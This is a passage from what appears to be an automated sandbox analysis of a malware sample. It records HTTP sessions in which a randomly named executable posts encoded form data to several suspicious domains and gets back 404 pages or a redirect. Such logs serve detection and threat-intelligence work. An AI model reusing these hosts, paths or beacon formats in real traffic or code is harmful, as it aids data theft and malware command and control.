                                                                                      Sep 30, 2024 10:44:26.510438919 CEST165INData Raw: 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be
                                                                                      Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      36192.168.2.658812221.128.225.57802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:28.203646898 CEST504OUTGET /84h5/?9jtPKX=m90qfEx2Waj4M3qzKISaRwMNBxrGGJIjHL8e3ySRPK8oLcpI6mSZixZy+bRbuIjP1deJ2nKHD1dx+QvwZSZ/OQME4y6EqRE6EL+tH5CvtKetzx16bnZNcksA/ftcr1t/EGD4XGU=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.cqghwamc.top
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:44:29.163096905 CEST1236INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html
                                                                                      Server: Microsoft-IIS/8.5
                                                                                      Set-Cookie: _d_id=b92e251b6c5f2a852b091a4d6cbeb7; Path=/; HttpOnly; SameSite=Lax
                                                                                      Date: Mon, 30 Sep 2024 08:44:26 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 1163
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
                                                                                      Sep 30, 2024 10:44:29.163227081 CEST165INData Raw: 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be
                                                                                      Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      37192.168.2.6588133.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:34.212119102 CEST781OUTPOST /k9l7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.yesonkoicasino.net
                                                                                      Origin: http://www.yesonkoicasino.net
                                                                                      Referer: http://www.yesonkoicasino.net/k9l7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 76 57 54 52 6d 63 64 38 6c 49 63 53 46 72 39 5a 52 6d 2b 4f 47 74 43 63 36 32 69 59 78 37 7a 4e 49 4e 38 4a 63 58 4a 2f 34 78 6b 35 53 77 47 44 59 58 6d 5a 4c 4d 7a 7a 6d 41 62 74 6d 65 78 2b 70 6e 58 2b 6e 47 55 6c 68 39 55 31 38 45 72 36 2b 73 42 77 6d 53 6b 45 69 74 39 6d 65 6a 6e 48 59 45 6c 47 65 68 42 43 5a 79 4e 52 43 55 31 59 49 70 76 68 35 39 4b 63 78 39 53 58 37 75 48 6e 71 49 58 44 42 74 59 70 61 46 69 30 64 6f 2b 46 6d 30 44 57 31 65 4d 44 45 55 45 67 2f 78 35 66 55 6c 4e 38 4f 5a 30 49 43 70 6d 33 65 31 49 77 73 7a 67 4e 52 51 4a 79 54 74 77 62 47 41 34 75 35 59 79 66 5a 51 33 59 7a 63 73 42
                                                                                      Data Ascii: 9jtPKX=vWTRmcd8lIcSFr9ZRm+OGtCc62iYx7zNIN8JcXJ/4xk5SwGDYXmZLMzzmAbtmex+pnX+nGUlh9U18Er6+sBwmSkEit9mejnHYElGehBCZyNRCU1YIpvh59Kcx9SX7uHnqIXDBtYpaFi0do+Fm0DW1eMDEUEg/x5fUlN8OZ0ICpm3e1IwszgNRQJyTtwbGA4u5YyfZQ3YzcsB


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      38192.168.2.6588143.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:36.799252987 CEST805OUTPOST /k9l7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.yesonkoicasino.net
                                                                                      Origin: http://www.yesonkoicasino.net
                                                                                      Referer: http://www.yesonkoicasino.net/k9l7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 76 57 54 52 6d 63 64 38 6c 49 63 53 46 4c 4e 5a 55 47 43 4f 41 4e 43 44 31 57 69 59 36 62 7a 4a 49 4b 30 4a 63 53 78 76 74 53 41 35 63 30 4b 44 5a 53 4b 5a 4d 4d 7a 7a 2b 51 62 30 6f 2b 78 6c 70 6e 4b 65 6e 48 59 6c 68 39 41 31 38 46 62 36 35 66 70 7a 6e 43 6b 47 32 64 39 6b 51 44 6e 48 59 45 6c 47 65 68 56 6b 5a 79 46 52 42 6c 46 59 50 39 37 69 30 64 4b 54 32 39 53 58 2f 75 48 6a 71 49 58 78 42 76 38 50 61 47 61 30 64 6f 75 46 6c 68 2f 58 38 65 4d 42 62 45 46 67 2b 30 63 6a 61 54 34 76 41 36 51 53 61 2b 79 56 62 44 4a 71 77 41 67 75 44 41 70 77 54 76 6f 70 47 67 34 45 37 59 4b 66 4c 48 37 2f 38 6f 4a 69 51 71 50 45 6f 79 49 64 4c 6c 4d 49 37 39 2b 67 57 6a 74 35 33 77 3d 3d
                                                                                      Data Ascii: 9jtPKX=vWTRmcd8lIcSFLNZUGCOANCD1WiY6bzJIK0JcSxvtSA5c0KDZSKZMMzz+Qb0o+xlpnKenHYlh9A18Fb65fpznCkG2d9kQDnHYElGehVkZyFRBlFYP97i0dKT29SX/uHjqIXxBv8PaGa0douFlh/X8eMBbEFg+0cjaT4vA6QSa+yVbDJqwAguDApwTvopGg4E7YKfLH7/8oJiQqPEoyIdLlMI79+gWjt53w==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      39192.168.2.6588153.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:39.347944975 CEST1818OUTPOST /k9l7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.yesonkoicasino.net
                                                                                      Origin: http://www.yesonkoicasino.net
                                                                                      Referer: http://www.yesonkoicasino.net/k9l7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 76 57 54 52 6d 63 64 38 6c 49 63 53 46 4c 4e 5a 55 47 43 4f 41 4e 43 44 31 57 69 59 36 62 7a 4a 49 4b 30 4a 63 53 78 76 74 53 49 35 63 48 43 44 62 31 2b 5a 4e 4d 7a 7a 32 77 62 70 6f 2b 77 2f 70 6e 53 42 6e 48 45 66 68 37 45 31 7a 48 54 36 38 75 70 7a 2b 79 6b 47 70 4e 39 70 65 6a 6e 57 59 41 42 43 65 68 46 6b 5a 79 46 52 42 6d 64 59 63 4a 76 69 32 64 4b 63 78 39 53 4c 37 75 48 66 71 49 50 68 42 76 35 30 5a 32 36 30 64 4d 79 46 71 7a 58 58 6b 4f 4d 48 59 45 46 4f 2b 30 59 47 61 54 4d 6a 41 37 30 6f 61 35 61 56 5a 33 59 51 31 7a 41 4c 53 77 70 45 44 2f 6f 30 4a 6c 45 4a 38 65 7a 68 45 67 50 69 38 35 42 58 54 50 72 62 68 77 78 78 4f 32 41 37 7a 6f 76 46 61 52 41 4d 68 64 54 30 31 36 74 6e 69 57 73 4d 75 42 6c 76 30 2f 6b 33 38 65 33 4a 4b 6a 33 2b 49 73 39 77 75 67 41 4b 4f 61 75 71 65 55 6c 6c 41 51 30 39 67 47 33 2b 41 6e 56 66 41 71 71 51 7a 59 6c 6c 70 34 41 6b 66 6e 55 4f 57 58 7a 50 72 6c 4a 35 36 43 76 39 7a 32 35 37 34 58 62 59 6e 50 63 42 2b 6e 42 31 74 55 50 6c 56 69 4b [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=vWTRmcd8lIcSFLNZUGCOANCD1WiY6bzJIK0JcSxvtSI5cHCDb1+ZNMzz2wbpo+w/pnSBnHEfh7E1zHT68upz+ykGpN9pejnWYABCehFkZyFRBmdYcJvi2dKcx9SL7uHfqIPhBv50Z260dMyFqzXXkOMHYEFO+0YGaTMjA70oa5aVZ3YQ1zALSwpED/o0JlEJ8ezhEgPi85BXTPrbhwxxO2A7zovFaRAMhdT016tniWsMuBlv0/k38e3JKj3+Is9wugAKOauqeUllAQ09gG3+AnVfAqqQzYllp4AkfnUOWXzPrlJ56Cv9z2574XbYnPcB+nB1tUPlViK+x2zKK6jLc6Qm4RDBpTp/P89DMxy7/ybNUJnF9xstavVkdfbnLsVaM/LGkYQqTI1FHuLWgdticAJbWouUolwEn+iFZi6X6qO+Uzh8eTy91Q9vuBQrIevT/1w/5a8MnqxLmfeFHJyuahGQIixm3n+1Ov2jOiZAbXvF/62Tk5XZVFTVv+R7pbwoYMOIjzXSlCe3uMijONMh5SCOnmEXGUkNK9dzWZpCVQzSaHsQoLgPwZHSTPHwCYFmeVoSb7iB1QwuOsEbQ0cDaHt8KcENEMtqm3a6XbBufG5HXjEZATrtyjEzlxpcyfLPLAU6435eCrRacAgnW2e0Xregcr9w7u53tMhmat//2YHnqi3qi/67R/bsOXb8Y+TAH5FyvygLYjHHjknhWqw+L2FWAJXTemcQAuX8YyQLnmt4H4OdF009KsIECAJQbdv/xktoso0AXmMdSgOiDnbhJV3GW+OIh86D7YCiAVdp6cwwc6i5oSQXgujGYgPZYUgZFmkaVSXV32ebOiD0OZzIDuoPqFF/bbqHtkHjY13NOFsPpvUcjcWDsPrL0bXIcO2py1DAsAfGyIh4cPOpLuJUCAfZkx7kfWkio8Q4tgsexOcuHJoyvVWrXONtKrDZz6EcJPAe/G4RtbyTWAxPmosngckQrnbhaIyztw2Bl/74YUOQC [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      40192.168.2.6588163.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:41.983114958 CEST510OUTGET /k9l7/?9jtPKX=iU7xlsxzkrYOaJ03UWKIE/axiGr8zrmLGOQkbwAH5ClgHUe+YliICefp5kzZp7Bcmm3TqloUqqhUnmvDpapz/R4DhNtLZW/YFSxpez1iYQ5aBHFQdfaf/M2d0rHEzcblh7f2Iqc=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.yesonkoicasino.net
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:44:42.426778078 CEST412INHTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Mon, 30 Sep 2024 08:44:42 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 272
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 6a 74 50 4b 58 3d 69 55 37 78 6c 73 78 7a 6b 72 59 4f 61 4a 30 33 55 57 4b 49 45 2f 61 78 69 47 72 38 7a 72 6d 4c 47 4f 51 6b 62 77 41 48 35 43 6c 67 48 55 65 2b 59 6c 69 49 43 65 66 70 35 6b 7a 5a 70 37 42 63 6d 6d 33 54 71 6c 6f 55 71 71 68 55 6e 6d 76 44 70 61 70 7a 2f 52 34 44 68 4e 74 4c 5a 57 2f 59 46 53 78 70 65 7a 31 69 59 51 35 61 42 48 46 51 64 66 61 66 2f 4d 32 64 30 72 48 45 7a 63 62 6c 68 37 66 32 49 71 63 3d 26 59 44 54 34 50 3d 34 78 64 38 44 7a 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9jtPKX=iU7xlsxzkrYOaJ03UWKIE/axiGr8zrmLGOQkbwAH5ClgHUe+YliICefp5kzZp7Bcmm3TqloUqqhUnmvDpapz/R4DhNtLZW/YFSxpez1iYQ5aBHFQdfaf/M2d0rHEzcblh7f2Iqc=&YDT4P=4xd8DzO"}</script></head></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      41192.168.2.658817103.21.221.87802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:48.084320068 CEST787OUTPOST /v6un/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/v6un/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 52 6a 44 31 61 41 76 6e 4c 6c 4f 39 45 6a 68 2b 67 30 62 48 71 55 36 4c 63 42 62 4d 52 63 72 35 2b 53 79 64 77 4f 4a 68 4f 39 4e 4d 72 47 76 2f 6a 38 6c 6b 72 63 79 61 45 58 41 6b 5a 4e 4c 6c 74 37 78 42 7a 6e 4e 44 62 42 31 46 69 58 74 2b 62 2b 6a 4e 2b 55 6c 4a 37 2f 56 4e 62 79 39 66 37 68 54 53 59 43 55 47 41 39 6d 36 4f 61 57 74 72 45 71 69 72 71 2f 78 66 6c 72 34 35 62 37 64 56 71 36 36 4a 56 46 37 65 5a 38 6b 78 47 6e 71 5a 33 65 79 54 37 76 32 42 61 5a 35 37 76 6d 63 4c 61 71 6b 38 62 51 74 45 2f 78 63 67 51 50 51 31 71 58 52 52 38 52 72 38 50 4c 64 61 58 52 4b 36 76 76 57 6c 39 33 6a 4f 47 64 7a
                                                                                      Data Ascii: 9jtPKX=RjD1aAvnLlO9Ejh+g0bHqU6LcBbMRcr5+SydwOJhO9NMrGv/j8lkrcyaEXAkZNLlt7xBznNDbB1FiXt+b+jN+UlJ7/VNby9f7hTSYCUGA9m6OaWtrEqirq/xflr45b7dVq66JVF7eZ8kxGnqZ3eyT7v2BaZ57vmcLaqk8bQtE/xcgQPQ1qXRR8Rr8PLdaXRK6vvWl93jOGdz
                                                                                      Sep 30, 2024 10:44:48.971019983 CEST1033INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Mon, 30 Sep 2024 08:44:48 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      42192.168.2.658818103.21.221.87802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:50.862643003 CEST811OUTPOST /v6un/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                      Origin: http://www.rtpterbaruwaktu3.xyz
                                                                                      Referer: http://www.rtpterbaruwaktu3.xyz/v6un/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 52 6a 44 31 61 41 76 6e 4c 6c 4f 39 46 41 70 2b 69 58 7a 48 74 30 36 45 43 52 62 4d 62 38 72 39 2b 53 32 64 77 50 39 78 4f 4f 6c 4d 71 6d 66 2f 69 39 6c 6b 6f 63 79 61 4d 33 41 6c 48 39 4b 6e 74 37 30 30 7a 69 4e 44 62 43 4a 46 69 54 6c 2b 62 4e 4c 4d 2f 45 6c 4c 30 66 56 50 57 53 39 66 37 68 54 53 59 43 42 74 41 2b 57 36 4e 70 65 74 6b 41 2b 6c 71 71 2f 79 58 46 72 34 7a 37 37 5a 56 71 37 58 4a 51 64 52 65 62 45 6b 78 48 58 71 5a 6d 65 31 61 37 76 77 66 71 59 78 71 4f 6e 71 42 5a 37 34 69 71 6f 51 44 74 74 38 73 47 4f 4b 70 5a 58 79 44 73 78 70 38 4e 54 76 61 33 52 67 34 76 58 57 33 71 37 45 42 79 34 51 31 4b 43 68 56 6d 45 72 4a 5a 63 35 66 71 67 66 42 74 42 59 50 77 3d 3d
                                                                                      Data Ascii: 9jtPKX=RjD1aAvnLlO9FAp+iXzHt06ECRbMb8r9+S2dwP9xOOlMqmf/i9lkocyaM3AlH9Knt700ziNDbCJFiTl+bNLM/ElL0fVPWS9f7hTSYCBtA+W6NpetkA+lqq/yXFr4z77ZVq7XJQdRebEkxHXqZme1a7vwfqYxqOnqBZ74iqoQDtt8sGOKpZXyDsxp8NTva3Rg4vXW3q7EBy4Q1KChVmErJZc5fqgfBtBYPw==
                                                                                      Sep 30, 2024 10:44:51.684631109 CEST1033INHTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 796
                                                                                      date: Mon, 30 Sep 2024 08:44:51 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      43192.168.2.658819103.21.221.87802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:53.443300009 CEST1824OUTPOST /v6un/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.rtpterbaruwaktu3.xyz
